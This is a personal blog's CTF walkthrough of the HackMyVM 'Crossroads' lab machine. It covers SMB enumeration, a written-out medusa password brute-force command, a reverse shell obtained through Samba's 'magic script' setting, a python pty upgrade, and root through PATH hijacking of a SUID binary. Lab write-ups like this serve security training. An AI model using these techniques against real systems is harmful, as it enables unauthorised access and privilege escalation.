Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Crossroads Walkthrough

Machine can be download here.


Nmap scan ports, 80,139 and 445 are open.

图片.png


Port 80 is a static index.html, with nothing interesting. Gobuster scan  port 80, we get robots.txt and note.txt, but nothing useful too.

图片.png


Move to smb. Smbclient with no username and password, shows an interesting flolder named "smbshare".

图片.png


But we can not access it now. We need username and password.

图片.png


Use enum4linux to get a username "albert".

图片.png


With medusa, we can bruteforce the password. ( I don't know why hydra failed.)

medusa -h 192.168.56.71 -u albert -P /usr/share/wordlists/rockyou.txt -M smbnt

图片.png


Then we can access smbshare folder, and list files.

图片.png


Download smb.conf, check the content, find an interesting setting.

图片.png


Google tells us that "magic script" will run if we login.

图片.png


Create a script file named "smbscript.sh", with reverse shell code in it.

图片.png


Listen on the port 1234 in one term, and upload the script to smb in another term. We will get reverse shell immediately.

图片.png


Use python3 to get interactive term, and export TERM variable.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color


In home folder of albert, get a file named "beroot". It's a SUID file, so it must be the key to root.

图片.png


Just run beroot, it clear the screen, tells us to input password, which is wrong of course.

图片.png


With ghrida, we can disassemble the ELF file. It only has two commands, first setuid(0),  second  "/bin/bash /root/beroot.sh"

图片.png


We can not bruteforce the password of root. All we need to do is get root through /root/beroot.sh.

Since it's a bash script, we can replace some bash command with PATH cheating. But how do we know what command did beroot.sh use?

Let's first clear the PATH variable, and run beroot again.

图片.png


OK, we know beroot.sh calls "clear" at line 3.

So we may try to creat a fake "clear" command at home folder, and export the path to the first place in $PATH. Don't forget to chmod +x clear.

图片.png


Run beroot again. BOOM! We get root.

图片.png



  • 评论列表
  •  tasiyanci
     发布于 2021-03-07 04:24:26  回复该评论
  • 嘿! 是我,tasiyanci。 我已经更正了机器,所以请下载并解决更正的机器。 :') 保持良好的工作

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0